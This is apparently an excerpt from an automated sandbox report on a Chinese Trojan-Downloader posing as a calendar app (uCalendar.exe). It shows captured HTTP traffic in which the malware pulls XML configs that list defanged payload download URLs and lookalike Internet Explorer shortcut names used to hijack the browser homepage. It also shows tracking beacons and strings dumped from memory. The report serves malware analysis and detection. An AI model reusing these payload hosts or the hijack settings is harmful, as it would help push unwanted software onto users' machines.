Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896
HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 30 Oct 2014 05:23:23 GMT
Accept-Ranges: bytes
ETag: "d443d39f1f4cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:34 GMT
Content-Length: 637
<?xml version="1.0" encoding="gb2312"?>..<root>.. <item id="0" off="1" opentime="60" gettime="1440" jiange="3600" shu="3"></item>.. <item id="1" name="hao123" Ads_Url="hXXp://down.xiaoxinrili.com/bao/appHao123_AndroidPhone_v4.7.2.0(4.7.2.0)_1002041t.apk" Ads_Exe="appHao123_AndroidPhone_v4.7.2.0(4.7.2.0)_1002041t.apk" Ads_Param="" ads_img=""></item>..<item id="2" name="........" Ads_Url="hXXp://down.xiaoxinrili.com/bao/9YaoForAndroid.apk" Ads_Exe="9YaoForAndroid.apk" Ads_Param="" ads_img=""></item>..<item id="3" name="360......" Ads_Url="hXXp://cnrdn.com/cnBF" Ads_Exe="360mse_H081067.apk" Ads_Param="" ads_img=""></item>..</root>....
GET /daohang/yx.xml HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896
HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 07 Sep 2014 09:12:59 GMT
Accept-Ranges: bytes
ETag: "20fdeeb7bcacf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:34 GMT
Content-Length: 305
<?xml version="1.0" encoding="gb2312"?>..<root>.. <item id="0" off="0" opentime="1800" gettime="1440" jiange="3600" shu="1" qudaono="" is_quit="0"></item>.. <item id="1" name="........" Ads_Url="hXXp://down.xiaoxinrili.com/bizhi/01/tt0905.exe" Ads_Exe="tt0905.exe" Ads_Param="" ads_img=""></item>..</root>....
GET /daohang/tubiao.xml HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896
HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 14 Jan 2015 08:26:54 GMT
Accept-Ranges: bytes
ETag: "2ae5d5dad32fd01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:35 GMT
Content-Length: 2263
<?xml version="1.0" encoding="gb2312"?>..<root>..<item tid="0" toff="1" topentime="400" tgettime="1200" tjiange="3600" tshu="3" offone="1" byday="0" IENAV_PElnkisC="0" IENAV_PElnkurl="hXXp://hao.360.cn/?src=lm&ls=n162f37fb94" IENAV_shell_time="10" IENAV_PElnkname="1nternet Exploert.lnk" IENAV_PElnkico="hXXp://down.xiaoxinrili.com/ico/Icon_1.ico" IENAV_shell="1" IENAV_shell_changelist="3600.........lnk,Internet Sulierie.lnk,Internet Explorers.lnk,Internet KuaipIE.lnk,hao123.........lnk,Intarnat Explarer.lnk,Internet Eslangie.lnk,Internet Expubie.lnk,Internet .Hao360..lnk,Internet Eslangie.lnk,Internet Explorers.lnk,Internet KuaipIE.lnk,1ntrenet Hao.123..lnk,Internet Exp1orer.lnk,Internet Hao123 .lnk,Internet Hao360.lnk,Internet Explorer.lnk,3600.........lnk,360.........lnk, 1nternot Hao123s.lnk, Internor Hao123.lnk, 1nternot Hao123.lnk,360..........6.lnk,360.........lnk,1nternet .Hao360..lnk,1nternet Explorer.lnk,Internet Explorer.lnk,Internet Explorer.lnk,Internet Explarcrs,lnk,Internet Exp1orer,lnk,Internet Explorer.lnk,Intermet hao123cs.lnk,1ntermet hao123rl.lnk, Intener Hao123,lnk,360...... 3600.lnk,Intotnot ExpIerer,Intornet HaoI123,1ntornet .HaoI123.,Internet ExpIorer.exe,Intornet HaoI123.lnk,1ntomret _hao.123.lnk,....123.lnk,....123.........lnk,Internet Expiorer.lnk,.................lnk," IENAV_shell_changeurl = "hXXp://hao.360.cn/?src=lm&ls=n162f37fb94" IENAV_shell_dellist = ""..></item>..<item tid="1" name="Internet Exploror" Ads_Url="hXXp://VVV.315619.com/?a01
<<< skipped >>>
GET /9.gif?abc=1&rnd=1658784305 HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/tj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cnzz.mmstat.com
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: Tengine
Date: Wed, 14 Jan 2015 11:51:34 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=RkY9DbJslnYCAcGK9OdJn7XJ; expires=Sat, 11-Jan-25 11:51:34 GMT; path=/; domain=.mmstat.com
Set-Cookie: sca=e1a96173; path=/; domain=.cnzz.mmstat.com
Set-Cookie: atpsida=6b6110718aa3354e88624c9e_1421236294; expires=Sat, 11-Jan-25 11:51:34 GMT; path=/; domain=.cnzz.mmstat.com
Location: hXXp://pcookie.cnzz.com/app.gif?&cna=RkY9DbJslnYCAcGK9OdJn7XJ
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;
GET /?app=weather.future&weaid=1&appkey=12154&sign=1b5d950e15ba193e96405dd75be5ab1f&format=json HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: k780.xiaoxinrili.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Wed, 14 Jan 2015 11:49:49 GMT
Content-Type: application/json; charset=utf-8;
Content-Length: 3359
Connection: keep-alive
X-Cache-CFC: HIT - - httpGETk780.xiaoxinrili.com/?app=weather.future&weaid=1&appkey=12154&sign=1b5d950e15ba193e96405dd75be5ab1f&format=json
{"success":"1","result":[{"weaid":"1","days":"2015-01-14","week":".........","cityno":"beijing","citynm":"......","cityid":"101010100","temperature":"2.../-5...","humidity":"0.../0...","weather":"............","weather_icon":"hXXp://api.k780.com:88/upload/weather/d/14.gif","weather_icon1":"hXXp://api.k780.com:88/upload/weather/n/53.gif","wind":"...............","winp":"......","temp_high":"2","temp_low":"-5","humi_high":"0","humi_low":"0","weatid":"15","weatid1":"33","windid":"124","winpid":"125"},{"weaid":"1","days":"2015-01-15","week":".........","cityno":"beijing","citynm":"......","cityid":"101010100","temperature":"3.../-3...","humidity":"0.../0...","weather":"...","weather_icon":"http://api.k780.com:88/upload/weather/d/53.gif","weather_icon1":"hXXp://api.k780.com:88/upload/weather/n/53.gif","wind":"........................","winp":".........3-4...","temp_high":"3","temp_low":"-3","humi_high":"0","humi_low":"0","weatid":"33","weatid1":"33","windid":"145","winpid":"131"},{"weaid":"1","days":"2015-01-16","week":".........","cityno":"beijing","citynm":"......","cityid":"101010100","temperature":"5.../-6...","humidity":"0.../0...","weather":"............","weather_icon":"hXXp://api.k780.com:88/upload/weather/d/1.gif","weather_icon1":"http://api.k780.com:88/upload/weather/n/0.gif","wind":"......","winp":"4-5......3-4...","temp_high":"5","temp_low":"-6","humi_high":"0","humi_low":"0","weatid":"2","weatid1":"1","windid":"20","winpid":"54"},{"weaid":"1","days":"2015-01-17","week":".........","cityno":"beijing","ci
<<< skipped >>>
GET /?app=weather.future&weaid=1&appkey=12154&sign=1b5d950e15ba193e96405dd75be5ab1f&format=json HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: k780.xiaoxinrili.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Wed, 14 Jan 2015 11:49:52 GMT
Content-Type: application/json; charset=utf-8;
Content-Length: 3359
Connection: keep-alive
X-Cache-CFC: HIT - - httpGETk780.xiaoxinrili.com/?app=weather.future&weaid=1&appkey=12154&sign=1b5d950e15ba193e96405dd75be5ab1f&format=json
{"success":"1","result":[{"weaid":"1","days":"2015-01-14","week":".........","cityno":"beijing","citynm":"......","cityid":"101010100","temperature":"2.../-5...","humidity":"0.../0...","weather":"............","weather_icon":"hXXp://api.k780.com:88/upload/weather/d/14.gif","weather_icon1":"hXXp://api.k780.com:88/upload/weather/n/53.gif","wind":"...............","winp":"......","temp_high":"2","temp_low":"-5","humi_high":"0","humi_low":"0","weatid":"15","weatid1":"33","windid":"124","winpid":"125"},{"weaid":"1","days":"2015-01-15","week":".........","cityno":"beijing","citynm":"......","cityid":"101010100","temperature":"3.../-3...","humidity":"0.../0...","weather":"...","weather_icon":"http://api.k780.com:88/upload/weather/d/53.gif","weather_icon1":"hXXp://api.k780.com:88/upload/weather/n/53.gif","wind":"........................","winp":".........3-4...","temp_high":"3","temp_low":"-3","humi_high":"0","humi_low":"0","weatid":"33","weatid1":"33","windid":"145","winpid":"131"},{"weaid":"1","days":"2015-01-16","week":".........","cityno":"beijing","citynm":"......","cityid":"101010100","temperature":"5.../-6...","humidity":"0.../0...","weather":"............","weather_icon":"hXXp://api.k780.com:88/upload/weather/d/1.gif","weather_icon1":"http://api.k780.com:88/upload/weather/n/0.gif","wind":"......","winp":"4-5......3-4...","temp_high":"5","temp_low":"-6","humi_high":"0","humi_low":"0","weatid":"2","weatid1":"1","windid":"20","winpid":"54"},{"weaid":"1","days":"2015-01-17","week":".........","cityno":"beijing","ci
<<< skipped >>>
GET /stat.htm?id=1253322244&r=&lg=en-us&ntime=none&cnzz_eid=307117902-1421236297-&showp=1276x846&t=&h=1&rnd=31178880 HTTP/1.1
Accept: */*
Referer: hXXp://down.xiaoxinrili.com/hezi/xxurl.html?iexplore.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: z9.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Wed, 14 Jan 2015 11:51:38 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Tue, 28 May 2013 02:57:17 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..
GET /daohang/xttj.html?%original file name%.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: update.xiaoxinrili.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Mon, 25 Aug 2014 06:09:09 GMT
Accept-Ranges: bytes
ETag: "d81386152bc0cf1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:20 GMT
Content-Length: 585
<<< skipped >>>
GET /tj/a1.html?%original file name%.exe&type=silent&hp=00&al=Lnk_Hao123_1|Lnk_ahxy_1&errno= HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1
HTTP/1.1 200 OK
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Thu, 25 Jul 2013 08:30:48 GMT
Accept-Ranges: bytes
ETag: "51fbc6431189ce1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:29 GMT
Content-Length: 202
Map
The Trojan-Downloader connects to the servers at the following location(s):
Strings from Dumps
uCalendar.exe_1840:
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor failed: %s
vtable constructor did not declare schema: %s
vtable constructor did not declare schema: %s
no such module: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
table %s: xBestIndex returned an invalid plan
at most %d tables in a join
at most %d tables in a join
cannot use index: %s
cannot use index: %s
TABLE %s
TABLE %s
%s AS %s
%s AS %s
%s WITH INDEX %s
%s WITH INDEX %s
%s VIA MULTI-INDEX UNION
%s VIA MULTI-INDEX UNION
%s USING PRIMARY KEY
%s USING PRIMARY KEY
%s VIRTUAL TABLE INDEX %d:%s
%s VIRTUAL TABLE INDEX %d:%s
%s ORDER BY
%s ORDER BY
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
unable to close due to unfinished backup operation
SQL logic error or missing database
SQL logic error or missing database
large file support is disabled
large file support is disabled
no such vfs: %s
no such vfs: %s
database corruption found by source line %d
database corruption found by source line %d
misuse detected by source line %d
misuse detected by source line %d
cannot open file at source line %d
cannot open file at source line %d
.?AVCWebBrowserEventHandler@DuiLib@@
.?AVCWebBrowserEventHandler@DuiLib@@
.?AVCWebBHandler@@
.?AVCWebBHandler@@
.?AVCMsgWnd@@
.?AVCMsgWnd@@
.?AVCWebIEHandlerpop@@
.?AVCWebIEHandlerpop@@
.?AVCWebBHandlerpop@@
.?AVCWebBHandlerpop@@
.?AVCWebBHandler1@@
.?AVCWebBHandler1@@
.?AVGenericHTTPClient@@
.?AVGenericHTTPClient@@
.PAVCException@@
.PAVCException@@
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uCalendar.exe
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uCalendar.exe
(*8\(*8\(*8\(*8\
(*8\(*8\(*8\(*8\
(*8\(*8\
(*8\(*8\
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\
Calendar.exe
Calendar.exe
.KA28/'
.KA28/'
=*=/=4=:=
=*=/=4=:=
3 3$3(3,3034383
3 3$3(3,3034383
0*00070^0{0
0*00070^0{0
5-555_5{5
5-555_5{5
2-252_2{2
2-252_2{2
?-?5?_?{?
?-?5?_?{?
404
404
0-0}0
0-0}0
999@99:@:
999@99:@:
7*838`8{8
7*838`8{8
6$6(6,6064686
6$6(6,6064686
5-5T5}5
5-5T5}5
: :$:(:,:0:
: :$:(:,:0:
3?4
3?4
5&757&
5&757&
9 9$9(9,9094989
9 9$9(9,9094989
7(7@7\7|7
7(7@7\7|7
accKeyboardShortcut
accKeyboardShortcut
ekernel32.dll
ekernel32.dll
mscoree.dll
mscoree.dll
KERNEL32.DLL
KERNEL32.DLL
5555443332
5555443332
05555443332
05555443332
5555443332
5555443332
(*.*)
(*.*)
uCalendar.exe
uCalendar.exe
riliquicken.exe_408: